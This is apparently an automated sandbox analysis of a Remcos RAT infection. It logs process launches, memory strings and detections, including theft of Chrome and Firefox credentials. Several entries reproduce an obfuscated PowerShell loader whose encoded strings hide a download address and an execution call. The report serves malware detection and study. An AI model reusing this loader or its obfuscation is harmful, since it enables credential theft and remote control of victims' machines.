                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteer
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat genbrupudnvnel:donnish/telefon/gambesm1esquire0aktiesm3nonrepa. pushie2spag um3 entome7simonio. digame8 cul ee6 mistan. ba oni2sawneba4porella7rodesbl/ clenchf boatsiropprioregraagaamandenklmbetonk,esexol glboghvediaf.rftegadipsybs calceit geodifeulcerog.electroxapp,ehesaf,rydsnholden ';$deutoxide=fyrstendmme 'valgets>bakteri ';$triangularize=fyrstendmme 'udfyldnimikalaseuforkorxreprodu ';$doozie='medansvaret';$bombestoppets = fyrstendmme ' ,ulbrieul,triccungr.sphforretnoafrett. pa.gene%becifreainex,repruelsenpcostaladcarabaoaalk,nettpja,tesafleshbr%tidtag.\ nonmitdsystemko lnra,mbekstraibscragglebudgettlparadeftcraniomrsrsynetuthiokoldclericiesecondin do torshamalds1avgusta4hildebo0a bejds.hugtandaskoleinfunreal.fserpent trillin&hilsene&b ngtow p.cocureinterfrctubi,olhartiumsoc onebr .ustulatunmetap ';illish (fyrstendmme ' pixm.p$gastroegtypot kl etreado trachob pse.doa hrynidl la.dsd:forsnkndmimicaleandalusb mirska,osmolat halefiestandtirdidrach= nati.n(genaabnc derre.msteerJump to behavior
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneer
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerz:
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerneerG
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerXX\N
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG:
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQ
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:x
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(x86)\windows mail\wab.exe
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager=
                Source: wab.exe, 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerneeru
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager|
                Source: wab.exe, 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.drBinary or memory string: [Program Manager]
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21362933 cpuid 10_2_21362933
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21362264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,10_2_21362264
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,15_2_004082CD
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041739B GetVersionExW,14_2_0041739B
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0000000A.00000002.3372008001.000000000582C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3384711680.00000000210CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3372008001.0000000005811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1096, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
